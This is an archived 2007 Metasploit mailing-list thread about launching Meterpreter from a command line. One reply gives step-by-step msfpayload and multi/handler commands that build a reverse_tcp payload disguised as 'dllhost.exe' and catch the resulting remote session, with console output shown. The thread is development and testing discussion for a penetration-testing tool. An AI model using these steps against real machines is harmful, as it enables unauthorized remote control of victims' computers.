Home page logo
/

metasploit logo Metasploit mailing list archives

Meterpreter from a command line
From: chaines at gmail.com (Chuck Haines)
Date: Wed, 28 Feb 2007 09:41:46 -0500

Excellent.  I was so close it hurt as I almost had this done.

By the way, I've implemented a nice recursive search feature in the
meterpreter.  I should share the code, but it still has a few bugs and
could use some cleaning it.

--chuck

On 2/27/07, mmiller at hick.org <mmiller at hick.org> wrote:
Chuck,

Client-side support for stdapi has not been implemented in C.  However, you
should be able to accomplish what you're asking by using the payload handler
exploit.  This will use Metasploit's builtin support for stdapi in ruby, and
makes testing a whole lot easier.

Note: make sure you svn update, a recent change had slightly changed the behavior
of the payload handler which introduced some problems.

Here's how to go about this:

Step 1: Generate the executable that will act as the host for the meterpeter DLL.

This executable hosts the first stage of the payload (the reverse connect):

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.4.79.2 X > dllhost.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 177
Options: LHOST=10.4.79.2

Step 2: Start the payload handler

$ ./msfconsole

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ msf v3.0-beta-dev
+ -- --=[ 180 exploits - 104 payloads
+ -- --=[ 18 encoders - 5 nops
       =[ 31 aux

msf > use multi/handler
msf exploit(handler) > set LHOST 10.4.79.2
LHOST => 10.4.79.2
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...

Step 3: Run dllhost.exe on the target computer

After running dllhost.exe, you should see this from msfconsole:

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.4.79.2:4444 -> 10.4.79.102:3031)

meterpreter > idletime
User has been idle for: 8 secs
meterpreter >

Keep in mind that you can use the payload handler from msfcli too.

Hope that helps.

On Tue, Feb 27, 2007 at 01:16:21PM -0500, Chuck Haines wrote:
Hello all,
  I'm trying to write an example of using the meterpreter from the
command line.  What I want to do is have an exe that start meterpreter
and connects back to another machine.  I have succesfully written the
code that starts the meterpreter and connects back and it communicates
just fine.  However when I try and load the stdapi, it tells me it
loads is succesfully, but doesn't actually give me the option of using
it.  Any help with this would be much appreciated.  I'm using the
metcli.exe that comes with the metepreter to listen for a connection
and custom code to connect back to the metcli.exe and perform the init
on the metsrv.dll.
  In the previous release (2.7), I had to modify the metcli so it
knew about the stdapi (well back then fs, net, etc), but it seems that
the client portion of the stdapi no longer exists and there is only a
server portion.  Is that because it was never written or am I missing
something?  If someone could give a way to use msfconsole and have it
spawn a meterpreter reverse_tcp without having to do an expoit, that
would be the best.

Thanks,
Chuck

--
Chuck Haines
chaines at gmail.com
-----------------------------------------------------------
Tau Kappa Epsilon Fraternity
Fraternity For Life Alumni
http://www.tke.org
irc://irc.deepspace.org/TKE
-----------------------------------------------------------
Deepspace IRC NetAdmin
Providing Web Services for the Disabled
http://www.deepspace.org
irc://irc.deepspace.org/Lobby
-----------------------------------------------------------



-- 
Chuck Haines
chaines at gmail.com
-----------------------------------------------------------
Tau Kappa Epsilon Fraternity
Fraternity For Life Alumni
http://www.tke.org
irc://irc.deepspace.org/TKE
-----------------------------------------------------------
Deepspace IRC NetAdmin
Providing Web Services for the Disabled
http://www.deepspace.org
irc://irc.deepspace.org/Lobby
-----------------------------------------------------------



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault